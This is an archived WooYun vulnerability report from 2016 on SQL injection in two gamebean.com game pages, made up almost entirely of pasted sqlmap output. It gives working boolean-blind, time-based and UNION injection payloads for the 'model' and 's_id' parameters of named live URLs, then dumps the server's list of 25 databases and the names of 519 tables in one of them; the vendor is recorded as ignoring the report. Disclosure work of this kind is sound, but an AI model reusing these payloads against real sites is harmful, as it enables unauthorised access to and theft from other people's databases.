乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开
2
http://game.gamebean.com/pdmodel_list.php?model=1&s=31&channel=A307
sqlmap identified the following injection points with a total of 58 HTTP(s) requests:---Parameter: model (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: model=1 AND 1104=1104&s=31&channel=A307 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307---web application technology: Nginxback-end DBMS: MySQL 5.0.12sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: model (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: model=1 AND 1104=1104&s=31&channel=A307 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307---web application technology: Nginxback-end DBMS: MySQL 5.0.12available databases [3]:[*] information_schema[*] ssfee_platform[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: model (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: model=1 AND 1104=1104&s=31&channel=A307 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307---web application technology: Nginxback-end DBMS: MySQL 5.0.12Database: ssfee_platform[519 tables]+---------------------------------+| ASDF || ASDF_copy || F_date || F_min || F_min_copy || F_set || F_t201002 || F_t20100225 || F_username || UA_ID_Z || UA_ID_Z_2 || UA_ID_Z_4 || UA_ID_Z_5 || 29fee || 3G_ji || 8001_power || 8002_power || 8003_power || use_wap_session_2010-01 || aa || ajax_admin || ajax_book || apur || apur_download || bbs_info || budata || budata_xjoys || c_Symbian || c_Symbian_copy || c_Symbian_copy1 || c_Symbian_copy2 || c_Symbian_copy3 || c_Symbian_copy4 || c_code || card_ass || cartoon_ass || categories || cc || channel_visit || channels || channels_state || channels_user || channels_user_2011 || channels_user_copy || channels_user_copy1 || channels_user_copy2 || channels_user_copy3 || channels_user_copy4 || channels_user_copy5 || channels_user_test || channels_wapinfo || chihot || chipang_list || chipang_termid || chipang_word || cmsgameinfo || cmsstat || conf_datas || consigns || cookword || cp_Management || cs || csj_trade || del_code || del_wid || distributes || do_game || do_user || dousou_user || downloadtermid || duandai_liliang || fee_kou_log || fee_logs || fee_logs_2008 || fee_logs_wap || fee_logs_xjoys || fee_logs_zysd || fee_methods || fee_nodes || flash_img || gadd_info || gadd_jf || gadd_jfd || gadd_jfd_20130131_del || gadd_jfd_service || game_gonglue || game_stat || game_stat_00 || game_stat_20091029 || game_stat_3he1 || game_stat_wap || game_zystat || goldberg_content_pages || goldberg_controller_actions || goldberg_markup_styles || goldberg_menu_items || goldberg_permissions || goldberg_roles || goldberg_roles_permissions || goldberg_site_controllers || goldberg_system_settings || goldberg_users || haoduan || haoduan_ds || huodong || image_ass || index_admin || jar_list || jz_check || kf_ || kf_sms || kq || m_box_fx_201002 || m_box_fx_201003 || m_box_fx_201004 || m_box_fx_201005 || m_box_fx_201006 || m_box_fx_201007 || m_box_fx_201008 || m_box_fx_201009 || m_box_fx_201010 || m_box_fx_201011 || m_box_fx_201012 || m_box_fx_201101 || m_box_fx_201102 || m_box_fx_201103 || m_box_fx_201104 || m_box_fx_201105 || m_box_fx_201106 || m_box_fx_201107 || m_box_fx_201108 || marketing || mms_entities || mms_entity_items || mms_push_schedule_item_logs || mms_push_schedule_items || mms_push_schedules || mms_resource_items || mms_resource_types || mms_resources || mobile || mobile_game_info || mobile_group_mobile || model_info || model_info_copy || mojie || mojie_code || mojieonlineid || mp3_ass || mp3_ass_swap || new_jf_dz || nokia_ji || online_code || p_ad || p_ad_copy || p_ad_copy1 || p_ad_info || p_admin || p_admin_57 || p_admin_zl || p_adver_admin || p_area || p_config || p_ip || p_newsbase || p_newsclass || p_newscontent || p_tj || p_user_ip || p_user_ip_are || play_ji || plugin_schema_info || power_ota || product_comment || product_substance || product_substance2 || productinfo || productinfo_wap || productinfo_xjoys || profession_info || ring_ass || rms_info || sanxing || sanxing_copy || sanxing_copy1 || sanxing_ji || sanxing_ji_copy || sanxing_ji_copy1 || sanxing_ji_copy2 || sanxing_ji_copy3 || sanxing_sx || sanxing_sxj || schema_info || school_word || sdong_ji || seach_name_waptype || seach_name_wapurl || seek_gateway_chengben || seek_gateway_chengben_tmp || seek_gateway_fee || seek_gateway_fee_tmp || seek_net_fee || seek_net_fee_2010 || seek_net_fee_tmp1 || seekdata || shop_cp || shop_dd || shop_dz || shop_gwc || shop_qd || shop_qd_copy || shop_qd_copy1 || shop_qd_copy2 || shop_qd_copy3 || shop_qd_h || shop_qd_h_s || shop_qd_test || shop_sp || sj_data || sms_checkinfo || sms_code || sms_code_20091217 || sms_code_copy || sms_code_copy1 || sms_fee1ting_logs || sms_fee_logs || sms_fee_logs_6501 || sms_fee_logs_jzmw || super_cplog_200907 || super_cplog_200908 || super_cplog_200909 || super_cplog_200910 || super_cplog_200911 || super_cplog_200912 || super_cplog_201001 || super_cplog_201002 || super_cplog_201003 || super_cplog_201004 || super_cplog_201005 || super_cplog_201006 || super_cplog_201007 || super_cplog_201008 || super_cplog_201009 || super_cplog_201010 || super_cplog_201011 || super_cplog_201012 || super_cplog_201101 || super_cplog_201102 || super_cplog_201103 || super_cplog_201104 || super_cplog_201105 || super_cplog_201106 || super_cplog_201107 || super_cplog_201108 || super_cplog_201109 || super_cplog_201110 || super_gstatlog_ || super_gstatlog_200910 || super_gstatlog_200911 || super_gstatlog_200911_tmp || super_gstatlog_200912 || super_gstatlog_201001 || super_gstatlog_201002 || super_gstatlog_201003 || super_gstatlog_201004 || super_gstatlog_201005 || super_gstatlog_201006 || super_gstatlog_201007 || super_gstatlog_201008 || super_gstatlog_201009 || super_gstatlog_201010 || super_gstatlog_201011 || super_gstatlog_201012 || super_gstatlog_201101 || super_gstatlog_201102 || super_gstatlog_201103 || super_gstatlog_201104 || super_gstatlog_201105 || super_gstatlog_201106 || super_gstatlog_201107 || super_gstatlog_201108 || super_gstatlog_201109 || super_gstatlog_201110 || super_statlog_00 || super_statlog_200901 || super_statlog_200902 || super_statlog_200903 || super_statlog_200904 || super_statlog_200905 || super_statlog_200906 || super_statlog_200907 || super_statlog_200908 || super_statlog_200909 || super_statlog_200910 || super_statlog_200911 || super_statlog_200912 || super_statlog_201001 || super_statlog_201002 || super_statlog_201003 || super_statlog_201003_copy || super_statlog_201004 || super_statlog_201005 || super_statlog_201005_cccc || super_statlog_201005_copy || super_statlog_201005_copy1 || super_statlog_201005_copy2 || super_statlog_201005_copy3_copy || super_statlog_201006 || super_statlog_201007 || super_statlog_2010079 || super_statlog_201008 || super_statlog_201009 || super_statlog_201010 || super_statlog_201010_copy || super_statlog_201010_copy_copy || super_statlog_201011 || super_statlog_201012 || super_statlog_201101 || super_statlog_201102 || super_statlog_201103 || super_statlog_201104 || super_statlog_201105 || super_statlog_201106 || super_statlog_201107 || super_statlog_201108 || super_statlog_201109 || super_statlog_201110 || super_statlog_ea_200901 || super_statlog_ea_200902 || super_statlog_ea_200903 || super_statlog_ea_200904 || super_statlog_ea_200905 || super_statlog_ea_200906 || super_statlog_ea_200907 || super_statlog_ea_200908 || super_statlog_ea_200909 || super_statlog_ea_200910 || super_statlog_ea_200911 || super_statlog_ea_200912 || super_statlog_ea_201001 || super_statlog_ea_201002 || super_statlog_ea_201003 || super_statlog_ea_201004 || super_statlog_ea_201005 || super_statlog_ea_201006 || super_statlog_ea_201007 || super_statlog_ea_201008 || super_statlog_ea_201009 || super_statlog_ea_201010 || super_statlog_ea_201011 || super_statlog_eatmp_200911 || super_statlog_eatmp_200912 || super_statlog_eatmp_201001 || super_statlog_eatmp_201002 || super_statlog_eatmp_201003 || super_statlog_eatmp_201004 || super_statlog_eatmp_201005 || super_statlog_eatmp_201006 || super_statlog_eatmp_201007 || super_statlog_eatmp_201008 || super_statlog_eatmp_201009 || super_statlog_eatmp_201010 || super_statlog_eatmp_201011 || super_statlog_eatmp_201012 || super_statlog_eatmp_201101 || super_statlog_eatmp_201102 || super_statlog_eatmp_201103 || super_statlog_eatmp_201104 || super_statlog_eatmp_201105 || super_statlog_eatmp_201106 || super_statlog_eatmp_201107 || super_statlog_eatmp_201108 || super_statlog_eatmp_201109 || super_statlog_eatmp_201110 || super_statlog_test_201005 || syncindex || syncindex_beiwei || syncindex_gadd || syncindex_netgame || syncindex_one || syncindex_xjoys || t || t1 || t200910 || t_1 || template_info || template_info2 || tempua || terminal_application_types || terminal_applications || terminal_applications2 || terminal_applications_copy || terminal_applications_copy1 || terminal_brands || terminal_items || terminal_resource_adapters || terminals || theme_ass || title_group || title_manage || tmp || tmpua || trend_channel || ua_lg || ua_tab || use_history_db || use_history_info || use_history_stat || use_history_useinfo || use_push_total || use_ua_stat || use_wap_down || use_wap_downactioon || use_wap_session || use_wap_view || vender || video_ass || w_num || wap_huodong || wap_name_cardtype || wap_name_cardtype_gengmingyu || wap_name_cardtype_liliang || wap_name_cardtype_panzhiwei || wap_name_cardtype_qiuxin || wap_name_cardtype_supei || wap_name_cardtype_wusheng || wap_name_cardtype_yichag || wap_name_cardtype_zhangheming || wap_name_cardurl || wap_name_cardurl_gengmingyu || wap_name_cardurl_liliang || wap_name_cardurl_panzhiwei || wap_name_cardurl_qiuxin || wap_name_cardurl_supei || wap_name_cardurl_wusheng || wap_name_cardurl_yichag || wap_name_cardurl_zhangheming || wap_name_cartoontype || wap_name_cartoonurl || wap_name_cartoonurl_copy || wap_name_cstype || wap_name_cstype_gengmingyu || wap_name_cstype_liliang || wap_name_cstype_panzhiwei || wap_name_cstype_qiuxin || wap_name_cstype_supei || wap_name_cstype_wusheng || wap_name_cstype_yichag || wap_name_cstype_zhangheming || wap_name_csurl || wap_name_csurl_copy_copy || wap_name_csurl_gengmingyu || wap_name_csurl_liliang || wap_name_csurl_panzhiwei || wap_name_csurl_qiuxin || wap_name_csurl_supei || wap_name_csurl_wusheng || wap_name_csurl_yichag || wap_name_csurl_zhangheming || wap_name_imagetype || wap_name_imageurl || wap_name_jxtype || wap_name_jxurl || wap_name_jxurl_z || wap_name_jxz || wap_name_keyword || wap_name_mp_s || wap_name_mptype || wap_name_mpurl || wap_name_playtype || wap_name_playurl || wap_name_themetype || wap_name_themeurl || wap_name_type || wap_name_type_j || wap_name_type_sq || wap_name_typezt1 || wap_name_typezt2 || wap_name_typezt3 || wap_name_typezt4 || wap_name_url || wap_name_url_j || wap_name_url_sq || wap_name_urlzt1 || wap_name_urlzt2 || wap_name_urlzt3 || wap_name_urlzt4 || wap_name_videotype || wap_name_videourl || wap_name_waptype || wap_name_waptype_copy1 || wap_name_wapurl || wap_name_wapurl_copy || wap_name_zt1type || wap_name_zt1url || wap_name_zt2type || wap_name_zt2url || wap_name_zt3type || wap_name_zt3url || wap_name_zt4type || wap_name_zt4url || wap_name_zt5type || wap_name_zt5url || wap_seek_info || wap_stat_type || wap_supermarket || wap_wtj || wap_zcsb_bean || wap_zcsb_play || wap_zcsb_tgwy || wap_zixun || z_d || z_ipone || z_ipone_1 || z_ipone_2 || z_ipone_3 || z_ipone_4 || z_ipone_b || z_ipone_z |+---------------------------------+
http://long.gamebean.com/game_enter.php?s_id=1
sqlmap identified the following injection points with a total of 217 HTTP(s) requests:---Parameter: s_id (GET) Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: s_id=-3250' UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x4762687879465a6b576f,0x717a6b7871)#---web application technology: PHP 5.2.10, Nginxback-end DBMS: MySQL >= 5.0.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s_id (GET) Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: s_id=-3250' UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x4762687879465a6b576f,0x717a6b7871)#---web application technology: PHP 5.2.10, Nginxback-end DBMS: MySQL 5available databases [25]:[*] aa[*] analyze[*] android[*] bbs[*] cjsh_user[*] cms[*] dx[*] football[*] game_stat[*] gcenter[*] gs[*] information_schema[*] lt_wap[*] mis[*] mysql[*] ourpalm[*] ssfee_platform[*] ssfee_platform_test[*] test[*] test_channel[*] union[*] user[*] user2406[*] webpay[*] yjws
危害等级:无影响厂商忽略
忽略时间:2016-01-23 15:40
漏洞Rank:4 (WooYun评价)
暂无
